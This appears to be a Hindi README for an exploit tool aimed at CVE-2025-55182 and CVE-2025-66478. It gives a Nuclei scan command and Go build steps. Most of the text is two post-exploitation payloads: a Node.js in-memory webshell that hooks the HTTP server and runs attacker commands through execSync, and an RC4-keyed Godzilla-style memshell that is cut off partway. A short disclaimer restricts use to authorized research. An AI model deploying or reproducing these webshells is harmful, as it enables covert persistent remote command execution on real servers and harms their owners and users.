
CVE-2025-55182 और CVE-2025-66478 के लिए शोषण
[!CAUTION] अस्वीकरण / Disclaimer
यह उपकरण केवल सुरक्षा अनुसंधान और शिक्षण के उद्देश्यों के लिए है। उपयोगकर्ता परीक्षण करने से पहले लक्ष्य सिस्टम से वैध प्राधिकरण प्राप्त करना सुनिश्चित करें।
अनधिकृत पैठ परीक्षण, दुर्भावनापूर्ण हमले, या किसी भी अवैध उपयोग के लिए सख्त वर्जित है। भेद्यता का पता लगाने और उसका शोषण करने से उत्पन्न सभी जोखिम और कानूनी परिणाम उपयोगकर्ता स्वयं वहन करेंगे, और ये परियोजना डेवलपर से संबंधित नहीं हैं।
यदि आप इन शर्तों को स्वीकार नहीं करते हैं, तो कृपया तुरंत इस उपकरण को डाउनलोड करना या उपयोग करना बंद करें।
यह उपकरण सार्वजनिक लेखों पर आधारित है; कोई पूर्व-संकलित बाइनरी वितरण प्रदान नहीं किया गया है। कृपया कोड का स्वयं ऑडिट करें और इसे संकलित करें।
इस उपकरण का मुख्य तर्क और बायपास दृष्टिकोण समुदाय के सुरक्षा शोधकर्ताओं से प्रेरित है। हम निम्नलिखित विशेषज्ञों को हार्दिक धन्यवाद देते हैं:
Prototype ChainArray Map Chainmodule._load) का समर्थन करता है।Nuclei का उपयोग करके बैच फिंगरप्रिंट पहचान और भेद्यता सत्यापन:
nuclei -l urls.txt -t CVE-2025-55182.yaml -o result.txt
# निर्भरताएँ व्यवस्थित करें
go mod tidy
# संकलित करें
go build -ldflags="-s -w" -o ReactExploit cmd/main.go
# चलाएँ
./ReactExploit
उन्नत शोषण -> मूल JS कोड निष्पादन मॉड्यूल में, पोस्ट-एक्सप्लॉइटेशन ऑपरेशन के लिए निम्नलिखित पेलोड का उपयोग किया जा सकता है।
cmdlinux
(function(){
try {
if (global.memshell_active) return "Memshell already active!";
var http = process.mainModule.require('http');
var cp = process.mainModule.require('child_process');
var qs = process.mainModule.require('querystring');
var originalEmit = http.Server.prototype.emit;
http.Server.prototype.emit = function(event, req, res) {
if (event === 'request' && req && res) {
var url = req.url || "";
if (req.method === 'POST' && url.indexOf('/?pass') !== -1) {
var bodyArr = [];
req.on('data', function(chunk) {
bodyArr.push(chunk);
});
req.on('end', function() {
try {
var bodyStr = Buffer.concat(bodyArr).toString();
var postData = qs.parse(bodyStr);
var cmd = postData['pwd'];
if (cmd) {
var output = cp.execSync(cmd).toString();
res.writeHead(200, {'Content-Type': 'text/plain'});
res.end(output);
} else {
res.writeHead(400);
res.end("Parameter 'pwd' is missing.");
}
} catch (e) {
res.writeHead(500);
res.end("Error: " + e.message);
}
});
return true;
}
}
return originalEmit.apply(this, arguments);
};
global.memshell_active = true;
return "Memshell injected!";
} catch (e) {
return "Injection failed: " + e.message;
}
})()
(function() {
try {
if (global.godzilla_memshell_hooked) return "Memshell already hooked!";
var http = process.mainModule.require('http');
var secretKey = '3c6e0b8a9c15224a';
var payloadName = 'ge0b8a';
function rc4(key, data) {
var s = Array(256), k = Array(256);
var i, j = 0, tmp;
for (i = 0; i < 256; i++) {
s[i] = i;
k[i] = key.charCodeAt(i % key.length);
}
for (i = 0; i < 256; i++) {
j = (j + s[i] + k[i]) % 256;
tmp = s[i];
s[i] = s[j];
s[j] = tmp;
}
i = j = 0;
var out = Buffer.alloc(data.length);
for (var idx = 0; idx < data.length; idx++) {
i = (i + 1) % 256;
j = (j + s[i]) % 256;
tmp = s[i];
s[i] = s[j];
s[j] = tmp;
var t = (s[i] + s[j]) % 256;
out[idx] = data[idx] ^ s[t];
}
return out;
}
var originalEmit = http.Server.prototype.emit;
http.Server.prototype.emit = function(event, req, res) {
if (event === 'request' && req && res && req.method === 'POST' && (req.url || "").indexOf('/76f03711') !== -1) {
var bodyArr = [];
req.on('data', function(chunk) {
bodyArr.push(chunk);
});
req.on('end', async function() {
try {
var bodyStr = Buffer.concat(bodyArr).toString();
var json = JSON.parse(bodyStr);